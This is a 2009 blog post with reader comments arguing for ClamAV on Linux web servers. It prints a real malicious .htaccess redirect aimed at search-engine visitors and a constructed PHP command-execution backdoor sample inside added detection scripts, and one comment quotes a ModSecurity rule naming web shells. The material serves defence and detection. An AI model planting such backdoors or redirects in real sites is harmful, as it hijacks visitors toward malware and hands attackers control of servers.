2 examples of Linux capable malware, for the sceptics

Posted April 6th, 2009 by j00p34

Since some people commented on my previous post that they don't think you need a virus scanner on Linux, here are some examples.

Both of these are found by ClamAV:

There is a group of hackers defacing sites who specialize in Joomla websites. If you run a Joomla website for a while and don't upgrade it when security updates are published, you have about a 99% chance of it being hacked (I don't know any real numbers, but I do know people who have experienced this several times).

Backdoor Script

These guys use a backdoor script based on PHP Shell. PHP Shell is a PHP program which gives you a shell-like environment in which you can run system commands on a remote server. So if you just remove the defacement page, they can put it right back. Or, as I have also seen, they install an email form which can be used to send spam.

The original can be found here:

http://phpshell.sourceforge.net/

You really don't want anybody to install this on your site; it gives them a lot of power over it.
This is detected by ClamAV.
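As an added illustration of what a scanner is looking for in this case (example code written for this page, not from the post, from PHP Shell or from ClamAV): a small Python heuristic that walks a web root and flags PHP files which hand request parameters straight to system()/exec(), or which eval() a base64-encoded blob, the two shapes a PHP-shell backdoor most often takes. The sample files, the directory names and the indicator names are all constructed for the example. ClamAV works differently, matching known shells by signature, so a structural check like this complements it rather than replacing it.

```python
import re
import tempfile
from pathlib import Path

# Constructed samples (not code from the post): a minimal PHP-shell-style
# backdoor of the kind described above, an obfuscated variant, and an
# ordinary template for contrast.
SAMPLE_SHELL = """<?php
if (isset($_REQUEST['cmd'])) {
    echo '<pre>';
    system($_REQUEST['cmd']);   // runs whatever the request carries
    echo '</pre>';
}
"""
SAMPLE_OBFUSCATED = """<?php
eval(gzinflate(base64_decode('QUJD')));  // 'QUJD' is a constructed placeholder, not a real payload
"""
SAMPLE_CLEAN = """<?php
echo '<h1>' . htmlspecialchars($title) . '</h1>';
"""

EXEC_FUNCS = r"\b(?:system|exec|passthru|shell_exec|popen|proc_open)\s*\("
USER_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"

# Heuristic indicators, each a regular expression over the PHP source.
INDICATORS = {
    # a command-execution function whose argument list mentions request input
    "exec-on-request-input": re.compile(EXEC_FUNCS + r"[^)]*" + USER_INPUT, re.S),
    # eval() fed directly from request input
    "eval-on-request-input": re.compile(r"\beval\s*\([^)]*" + USER_INPUT, re.S),
    # eval() of a base64 blob, optionally wrapped in a decompression call
    "eval-of-encoded-blob": re.compile(
        r"\beval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode\s*\(", re.S),
}


def shell_indicators(source: str) -> list[str]:
    """Return the names of the indicators that fire on one PHP source file."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def scan_webroot(root: Path) -> dict[str, list[str]]:
    """Map each suspicious .php file under root (relative path) to its indicators."""
    hits = {}
    for path in sorted(root.rglob("*.php")):
        found = shell_indicators(path.read_text(errors="replace"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits


def demo() -> dict[str, list[str]]:
    """Build a throwaway web root from the constructed samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "images").mkdir()
        # a shell dropped into an upload directory, as in the Joomla cases above
        (root / "images" / "thumb.php").write_text(SAMPLE_SHELL)
        (root / "cache.php").write_text(SAMPLE_OBFUSCATED)
        (root / "index.php").write_text(SAMPLE_CLEAN)
        return scan_webroot(root)


if __name__ == "__main__":
    for rel, names in demo().items():
        print(f"{rel}: {', '.join(names)}")
```

Run it nightly over the document root (as the hosting comment further down suggests doing with ClamAV) and review anything it reports; expect some false positives from legitimate admin tools, which is why the indicators report what fired rather than deleting anything.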

Curious about the hacker version?

If you would like to have the hackers' version, just install an old unpatched Joomla version on your website and wait a few months, especially over the summer holidays. This is mostly done by script kiddies; it's not very difficult to do.

Hidden redirect

Another nice one I found here:

http://www.provos.org/index.php?/categories/6-Malware

A web application had a vulnerability which allowed the hackers to install a .htaccess file:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http ://89.28.13.204/in.html?s=xx [R,L]

Know what this does? It redirects traffic coming in from major search engines to a site which then tries to install malware. ONLY traffic from major search engines, so if you access your site directly you don't notice anything. Just imagine the damage this can do to a popular website.

.htaccess is a very common file on web servers, so you have only a small chance of noticing this quickly.

And again this is found by ClamAV.

Test the scanner

Test this yourself: just create a local .htaccess file, copy and paste the block of rewrite rules, save the file and run the scanner on it. It won't harm you; just don't save it in any web directory.
(I inserted a space between http and : so it won't be seen as a URL on this site.)
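Besides running the signature scanner over it, the rewrite block above can be checked structurally. The following Python is added here as an example (not code from the post, from provos.org or from ClamAV): it parses a .htaccess, groups each RewriteRule with the RewriteCond lines that precede it, and reports rules that are gated on HTTP_REFERER matching a search engine and redirect (R flag) to a host you don't own. The sample .htaccess is constructed to mirror the quoted block, with the documentation address 192.0.2.10 standing in for the real one; the own_hosts parameter and the search-engine list are assumptions of the example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample mirroring the rule set quoted above; 192.0.2.10 is a
# documentation address standing in for the real one, not taken from the post.
SAMPLE_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://192.0.2.10/in.html?s=xx [R,L]
"""

# Constructed benign sample: the usual "route everything to index.php" rule.
BENIGN_HTACCESS = """RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?q=$1 [L]
"""

SEARCH_ENGINES = ("google", "yahoo", "msn", "bing", "aol", "ask", "altavista")


def parse_rewrite_blocks(text: str) -> list[dict]:
    """Group each RewriteRule with the RewriteCond lines that precede it."""
    blocks, conds = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 3)          # directive plus up to three arguments
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))   # (TestString, CondPattern)
        elif directive == "rewriterule" and len(parts) >= 3:
            flags = parts[3] if len(parts) > 3 else ""
            blocks.append({"conds": conds, "pattern": parts[1],
                           "target": parts[2], "flags": flags})
            conds = []                       # conditions apply only to the next rule
    return blocks


def gating_engines(conds) -> set[str]:
    """Names of the search engines a block's HTTP_REFERER conditions match on."""
    engines = set()
    for test_string, pattern in conds:
        if "HTTP_REFERER" not in test_string.upper():
            continue
        for engine in SEARCH_ENGINES:
            # require the name not to be glued to a preceding letter ("task" must not count as "ask")
            if re.search(rf"(?<![a-z0-9]){engine}", pattern.lower()):
                engines.add(engine)
    return engines


def is_external_redirect(target: str, flags: str, own_hosts=()) -> bool:
    """True when the rule redirects the browser (R flag) to a host we don't own."""
    flag_names = {f.strip().upper().split("=")[0]
                  for f in flags.strip("[]").split(",") if f.strip()}
    if "R" not in flag_names:
        return False
    host = urlsplit(target).hostname
    return host is not None and host not in own_hosts


def find_hidden_redirects(text: str, own_hosts=()) -> list[dict]:
    """Report rules that send only search-engine visitors off to another host."""
    findings = []
    for block in parse_rewrite_blocks(text):
        engines = gating_engines(block["conds"])
        if engines and is_external_redirect(block["target"], block["flags"], own_hosts):
            findings.append({"target": block["target"], "engines": sorted(engines)})
    return findings


if __name__ == "__main__":
    for hit in find_hidden_redirects(SAMPLE_HTACCESS, own_hosts=("www.example.org",)):
        print(f"hidden redirect to {hit['target']} for visitors from {', '.join(hit['engines'])}")
```

Because the rule only fires on search-engine referers, fetching your own site directly never shows the redirect; checking the file itself, or fetching a page with a Referer header set to a search engine, is how you would notice it.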

I think this proves that using a virus scanner can serve a purpose, at least as a malware scanner.
ClamAV is free, so there's no harm in using it every once in a while, just to check that the hackers didn't discover a security hole before you did.
antivirus

Anonymous 1 year 11 weeks 12 hours 16 min ago

Linux is great in that it doesn't need antivirus, but I would not run a production environment without it at all. Even if those are desktops, because you'll never know what is going to happen in the near future.

Late, but...

Anonymous 1 year 20 weeks 4 days 19 hours ago

I wanted to show you you're not completely wrong, as people have said.

You talk about servers, people talk about desktops, but ClamAV is also useful there: some email clients (e.g. KMail) support antivirus scanning, which may help in not redistributing an infected mail to your friends, or in identifying that one of your friends is infected and warning him/her.

Of course, ClamAV is very useful on servers. I'm a sysadmin at a Linux/Windows web hosting company and we use it to scan email for our Exchange users. We don't use it (yet) to scan email on all of our servers, but I know several ISPs and hosters do it.

Incidentally, just a few days ago I discovered that ClamAV can also detect PHP-based shells and mail bombers, a feature that will really help keep our servers more secure. Our customers don't always patch their web applications (Joomla, Mambo, PHP-Nuke, WordPress, etc.) and we have a couple of complaints every day (we run more than 10.000 websites, so it's not such a big number, but it's annoying to have to clean the same websites every week...).

The biggest problem is that most of the time you DON'T need administrative access to upload malicious content to a vulnerable website, as generally the shells are executed via code injection.

So, ClamAV will make our lives easier here, as we can run it every night to scan our users' websites and report malware, and we won't need to wait until someone sends us a complaint.

Cheers,
Ricardo

Man, you honestly talk too

Anonymous 1 year 21 weeks 1 day 19 hours ago

Man, you honestly talk too much rubbish. The first example is a non-example. What's the name of the script and how does it work? What's the name of the web application with the security flaw? What's ClamAV really supposed to identify? All rubbish. Info, info, please!

I guess I should have been more clear.

Anonymous 1 year 21 weeks 2 days 4 hours ago

My security preferences on Linux are based on my personal desktop. If I were running a Web server, that would change everything.

Well the rss on this is malware

Anonymous 1 year 21 weeks 2 days 5 hours ago

An RSS aggregator page I have was knocked off the web by ModSecurity because of the content of the RSS for this article. Oh, the irony.

False positives are a horrible pain.

SecRule RESPONSE_BODY "(?:[^<]*?(?:\b(?:(?:c(?:ehennemden|gi-telnet)|gamma web shell)\b|imhabirligi phpftp)|(?:r(?:emote explorer|57shell)|aventis klasvayv|zehir)\b|\.::(?:news remote php shell injection::\.| rhtools\b)|ph(?:p(?:(?: commander|-terminal)\b|remoteview)|vayv)|myshell)|\b(?:(?:(?:microsoft windows\b.{,10}?\bversion\b.{,20}?\(c\) copyright 1985-.{,10}?\bmicrosoft corp|ntdaddy v1\.9 - obzerve \| fux0r inc)\.|(?:www\.sanalteror\.org - indexer and read|haxplor)er|php(?:konsole| shell)|c99shell)\b|aventgrup\.|drwxr))" \
"phase:4,t:none,ctl:auditLogParts=+E,deny,log,auditlog,status:404,msg:'Backdoor access',id:'950922',tag:'MALICIOUS_SOFTWARE/TROJAN',severity:'2'"

sorry about that

admin 1 year 21 weeks 2 days 2 hours ago

I'm sorry about that; this .htaccess is also part of a worm, so it might be difficult not to false-positive on it.

Ok, a server should have

Anonymous 1 year 21 weeks 2 days 12 hours ago

Ok, a server should have anti-virus software, but what about Linux desktops? I don't have any of the mentioned services running.

So essentially... use an

Anonymous 1 year 21 weeks 2 days 12 hours ago

So essentially... use an 'anti-virus' because... you may have been running an unpatched security hole on your server....

Sorry, but it is very unlikely that ClamAV or any other 'scanner' detects any given security bug before the devs of the buggy application do and before it gets patched....

Case in point, your first example says "... and you don't upgrade it when security updates are published."

The second example says "A web application had a vulnerability".
Can you be more vague....

This whole argument boils down to "you should all take penicillin preemptively, because I know a guy that got syphilis while having unprotected sex with a prostitute in Zambia..."

BTW, before thinking about antibiotics, one should consider basic hygiene.
In the first case: follow your software's security updates... in the second case: check your tripwire reports.

These are not Linux malware - they are application specific

Anonymous 1 year 21 weeks 2 days 12 hours ago

In the first case you are talking about an issue in PHP. If I understand this correctly, the malware would be just as successful if PHP were running on top of IIS.

In the second case, this is again an application specific issue - not a Linux specific issue. Again, if I'm correct in reading between the lines, the same hole would exist if Apache were installed on a Windows server.

These are both akin to a MS Word macro "virus". The virus just happens to be running on Windows, but the problem is not Windows per se, but MS Word. In this case the application happens to be Apache and PHP, which just happen to run predominantly on Linux servers. This still doesn't make these Linux specific malware.

Of course, any critical tool (like Apache and PHP) should be kept up to date to avoid these sorts of issues. But that advice goes for ANY platform.

While a virus scanner may find the symptoms of such malware, it can do nothing to prevent it from getting on the system in the first place. ClamAV is usually configured to run periodically rather than on every single access (I could be wrong; it's been a while since I set up Clam), like once an hour. It would only report that you had been infected. What happens between the time of infection and the time of detection could be too damaging.

I'd rather just keep things up to date and avoid having to react. Proactive vs Reactive.

My thoughts

Nonsense

Anonymous 1 year 21 weeks 2 days 12 hours ago

This still doesn't prove you NEED an antivirus in Linux. The above examples need the user to have administrative rights to actually upload those scripts to specific directories. As for the Joomla part of the text, I've been running a highly accessed Joomla site for 2 and a half years. Never upgraded it. Never been hit. I guess I'm part of that 1%. :)

ok you don't need it

admin 1 year 21 weeks 2 days 9 hours ago

Ok I agree, you don't need it. I'm sorry if I disturbed you with that. It can be useful though.

I really didn't mean to upset anybody. I just think it can be useful, as there are 0-day exploits and security leaks that are not made public. I generally promote Linux, and I know and tell everybody that Linux is very secure.
So no harm meant here.